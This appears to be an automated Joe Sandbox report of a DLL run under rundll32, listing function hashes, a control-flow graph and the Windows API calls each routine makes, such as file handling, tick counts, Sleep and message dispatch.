                              • Instruction ID: c1f34be03cf0569538104f0038f02cfb84df381903d0011f2ebedd3a3241928c
                              • Opcode Fuzzy Hash: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                              • Instruction Fuzzy Hash: 76C0E9B550D6066E975C8F1AB480815FBE5FAC8324364C22EA01C83644D73154518A64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 289 4a47948-4a47962 290 4a47964-4a47967 289->290 291 4a47973-4a47984 289->291 292 4a47986-4a47997 290->292 293 4a47969-4a4796c 290->293 294 4a479aa-4a479b6 291->294 292->294 295 4a4796e 293->295 296 4a47999-4a479a3 293->296 297 4a47a60-4a47a80 CreateFileW 294->297 298 4a479bc-4a479c0 294->298 299 4a47bab-4a47bb1 295->299 296->294 300 4a47a94-4a47a9c 297->300 301 4a47a82-4a47a8f GetLastError 297->301 302 4a479d2-4a479df 298->302 303 4a479c2-4a479cb 298->303 304 4a47b64-4a47b6c 300->304 305 4a47aa2-4a47ab7 GetFileSize 300->305 301->299 306 4a479e1-4a479e7 302->306 307 4a479ff-4a47a06 GetStdHandle 302->307 303->302 308 4a47b7c-4a47b82 304->308 309 4a47b6e-4a47b75 304->309 311 4a47ac7-4a47acf 305->311 312 4a47ab9-4a47ac2 call 4a47930 305->312 313 4a479f0 306->313 314 4a479e9-4a479ee 306->314 310 4a47a08-4a47a10 307->310 308->299 316 4a47b84-4a47b8f GetFileType 308->316 309->308 310->308 315 4a47a16-4a47a21 GetFileType 310->315 319 4a47ad1 311->319 320 4a47ad3-4a47ae1 SetFilePointer 311->320 312->299 318 4a479f5-4a479fd GetStdHandle 313->318 314->318 323 4a47a23-4a47a29 315->323 324 4a47a4d-4a47a5b 315->324 325 4a47b96-4a47ba2 call 4a47930 316->325 326 4a47b91-4a47b92 316->326 318->310 319->320 321 4a47b02-4a47b0b call 4a47930 320->321 322 4a47ae3-4a47b00 ReadFile 320->322 321->299 322->321 328 4a47b10-4a47b14 322->328 330 4a47a3c-4a47a48 GetConsoleCP 323->330 331 4a47a2b-4a47a37 GetConsoleOutputCP 323->331 324->308 325->299 332 4a47ba4 326->332 333 4a47b94 326->333 328->304 336 4a47b16-4a47b1a 328->336 330->308 331->308 332->299 333->299 336->304 338 4a47b1c-4a47b22 336->338 338->304 339 4a47b24-4a47b27 338->339 340 4a47b2d-4a47b30 339->340 341 4a47b32-4a47b46 SetFilePointer 340->341 342 4a47b5f-4a47b62 340->342 343 4a47b54-4a47b5d call 4a47930 341->343 344 4a47b48-4a47b52 SetEndOfFile 341->344 342->304 342->340 343->299 344->304 344->343
                              APIs
                              • GetStdHandle.KERNEL32(FFFFFFF5), ref: 04A479F6
                              • GetStdHandle.KERNEL32(000000F6), ref: 04A47A01
                              • GetFileType.KERNEL32(00000000), ref: 04A47A19
                              • GetConsoleOutputCP.KERNEL32(00000000), ref: 04A47A2B
                              • GetConsoleCP.KERNEL32(00000000), ref: 04A47A3C
                              • GetFileType.KERNEL32(00000000), ref: 04A47B87
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: ConsoleFileHandleType$Output
                              • String ID:
                              • API String ID: 393880136-0
                              • Opcode ID: cd7a926fb78da4143bb82d092038d58306883150cb1b1b2a8324d865b52f44d7
                              • Instruction ID: 3ff376d1ae6e4c4ecab63fec792c3e6205fc12e781665c1c167cd29672ebe196
                              • Opcode Fuzzy Hash: cd7a926fb78da4143bb82d092038d58306883150cb1b1b2a8324d865b52f44d7
                              • Instruction Fuzzy Hash: 7F51C77C600280ABFF20EF6889C4B2E36A4AFC5354F148965D906CF2C6E774F94687A5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 04A496B9
                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 04A496BF
                              • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 04A496D2
                              • GetLastError.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 04A496DB
                              • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,04A49752,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 04A49706
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
                              • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                              • API String ID: 1184211438-79381301
                              • Opcode ID: cf672585705b0591d0640013818617bc4427596a14234d5ab743064ecc54e178
                              • Instruction ID: 8012089f53e8d4f0cdc1313e76e622b0ae49b6e2f9b7bf9f4a648707c926d609
                              • Opcode Fuzzy Hash: cf672585705b0591d0640013818617bc4427596a14234d5ab743064ecc54e178
                              • Instruction Fuzzy Hash: F1115CF0D00208BBEB10EFB5D945A9FB7ECABC0214F5480A5E514A7641E678BA508B11
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04A51ABC
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: ExceptionRaise
                              • String ID:
                              • API String ID: 3997070919-0
                              • Opcode ID: 2729a119e1019100f39080b8a4739ebca5d170463f4aa0e2c006a2832b548218
                              • Instruction ID: 9fba646f85772f823afdf1c93b653349141f899048c20bc1d78276171d8a44f3
                              • Opcode Fuzzy Hash: 2729a119e1019100f39080b8a4739ebca5d170463f4aa0e2c006a2832b548218
                              • Instruction Fuzzy Hash: B1A18C75E00209AFDB14CFA8DA84BFEB7B5FB48314F154529E905A7290EB70BD44CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 04A76E69
                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 04A76E85
                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 04A76EBE
                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 04A76F3B
                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 04A76F54
                              • VariantCopy.OLEAUT32(?), ref: 04A76F89
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                              • String ID:
                              • API String ID: 351091851-3916222277
                              • Opcode ID: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
                              • Instruction ID: 05728e83e23267e357d86e3db99500596edaa764c2e407f70d96628e2c91b1d0
                              • Opcode Fuzzy Hash: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
                              • Instruction Fuzzy Hash: 3251E875A00A299BDB32DB58CD80BD9B7BCAF4C314F0442D5E509A7211DA30AF848F61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • Sleep.KERNEL32(00000000,?,?,00000000,04A459A6), ref: 04A45DCA
                              • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,04A459A6), ref: 04A45DE4
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: b447ff5440d9f754fcd0667edf6bc2071655f1a5404a05fe39b62919eb6ae5fd
                              • Instruction ID: d4faee3318ee533c177043edf35006c74e19d5fcdc9d4ba857fa651d51691ca1
                              • Opcode Fuzzy Hash: b447ff5440d9f754fcd0667edf6bc2071655f1a5404a05fe39b62919eb6ae5fd
                              • Instruction Fuzzy Hash: 46711671E04340AFE715CF69C98871EBBE4EFC5724F18866AD6488B381DBB5AC41CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetCapture.USER32 ref: 04C37752
                              • IsWindowUnicode.USER32(00000000), ref: 04C37795
                              • SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 04C377B0
                              • SendMessageA.USER32(00000000,-0000BBEE,?,?), ref: 04C377CF
                              • GetWindowThreadProcessId.USER32(00000000), ref: 04C377DE
                              • GetWindowThreadProcessId.USER32(?,?), ref: 04C377EF
                              • SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 04C3780F
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                              • String ID:
                              • API String ID: 1994056952-0
                              • Opcode ID: 54e30cd852c92e218a8b2dfed5b943e50f3f30d5468374f8b1022b907a1f5199
                              • Instruction ID: 4bc578e66f1d919f9f28901b215b427b2be97c0d5f3c066eb7c79052dff1a7e8
                              • Opcode Fuzzy Hash: 54e30cd852c92e218a8b2dfed5b943e50f3f30d5468374f8b1022b907a1f5199
                              • Instruction Fuzzy Hash: 49217CB1206208AFE760FE59CE80FA773DDDF05215B14C828FD9DD3251EA24F90087A6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dbc77586d25d52d2987e17da954ff076a49957bb642cc508e631b180d752c617
                              • Instruction ID: 726bdad87cf5ea693477ba627de0fa24607e4983ca2b21f64fde6e4cac9e4fa2
                              • Opcode Fuzzy Hash: dbc77586d25d52d2987e17da954ff076a49957bb642cc508e631b180d752c617
                              • Instruction Fuzzy Hash: F1C13562B102406BE714DFBDDD8876EB3869BC5325F188639E304CB386EAB8EC458351
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 04A49DB8: GetCurrentThreadId.KERNEL32 ref: 04A49DBB
                              • GetTickCount.KERNEL32 ref: 04A49963
                              • GetTickCount.KERNEL32 ref: 04A4997B
                              • GetCurrentThreadId.KERNEL32 ref: 04A499AA
                              • GetTickCount.KERNEL32 ref: 04A499D5
                              • GetTickCount.KERNEL32 ref: 04A49A0C
                              • GetTickCount.KERNEL32 ref: 04A49A36
                              • GetCurrentThreadId.KERNEL32 ref: 04A49AA6
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: CountTick$CurrentThread
                              • String ID:
                              • API String ID: 3968769311-0
                              • Opcode ID: 80a25ac8b1408c67338e2b1a7f5057ed642fb1d85727205fdab71cf26d8a0383
                              • Instruction ID: 81ffbf6f4b9ed0157324d0f7be9badbf4c60a4b328f4a19f14c98f5f0f966464
                              • Opcode Fuzzy Hash: 80a25ac8b1408c67338e2b1a7f5057ed642fb1d85727205fdab71cf26d8a0383
                              • Instruction Fuzzy Hash: 9B419EB06083419EE721EFBCC98432FBBD9AFC5354F548A3DD5D88B291EA74A4918742
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 04C379A4
                              • IsWindowUnicode.USER32 ref: 04C379B8
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 04C379DB
                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 04C379F1
                              • TranslateMessage.USER32 ref: 04C37A76
                              • DispatchMessageW.USER32 ref: 04C37A83
                              • DispatchMessageA.USER32 ref: 04C37A8B
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                              • String ID:
                              • API String ID: 2190272339-0
                              • Opcode ID: c99aee6d61b1ffcf7939c47e50c4986ffeed5a1c9e5bd5e5c0ebcf8f6d84fd8e
                              • Instruction ID: d7afb2f34065abf28f30118616f7ed1b2e6c31447ebc9a87626ce7cc5e02c7f0
                              • Opcode Fuzzy Hash: c99aee6d61b1ffcf7939c47e50c4986ffeed5a1c9e5bd5e5c0ebcf8f6d84fd8e
                              • Instruction Fuzzy Hash: 722157E030A30676FB317A690D00B7E97974FC370FF14C869F885A7182C6A2B6028612
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,04C908A8,00000000,?,04A4AA6A,?,?,04C9CB9C,04C9CB9C,?,?,04C91C38,04A51A03,04C908A8), ref: 04A4A9E5
                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,04C908A8,00000000,?,04A4AA6A,?,?,04C9CB9C,04C9CB9C,?,?,04C91C38,04A51A03), ref: 04A4A9EB
                              • GetStdHandle.KERNEL32(000000F5,00000000,00000002,04C908A8,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,04C908A8,00000000,?,04A4AA6A,?,?,04C9CB9C), ref: 04A4AA06
                              • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,04C908A8,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,04C908A8,00000000,?,04A4AA6A,?,?), ref: 04A4AA0C
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: FileHandleWrite
                              • String ID: Error$Runtime error at 00000000
                              • API String ID: 3320372497-2970929446
                              • Opcode ID: e20b6ce164b3814bf15aa08b3fec88ae322f078010bbba65a62f7a5731a25c07
                              • Instruction ID: 55e233d74a00765ca25a82c7530f299b2d47cb72f0ba6f04bf0cca02a81e1306
                              • Opcode Fuzzy Hash: e20b6ce164b3814bf15aa08b3fec88ae322f078010bbba65a62f7a5731a25c07
                              • Instruction Fuzzy Hash: 2DF0F664AC4380BFFA20A7944E0FF6D26DCA7C6F29FA40119B254690C4CEA9FCC45731
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 04A4629A
                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 04A462A0
                              • GetStdHandle.KERNEL32(000000F4,04A453E8,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 04A462BF
                              • WriteFile.KERNEL32(00000000,000000F4,04A453E8,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 04A462C5
                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,04A453E8,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 04A462DC
                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,04A453E8,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 04A462E2
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
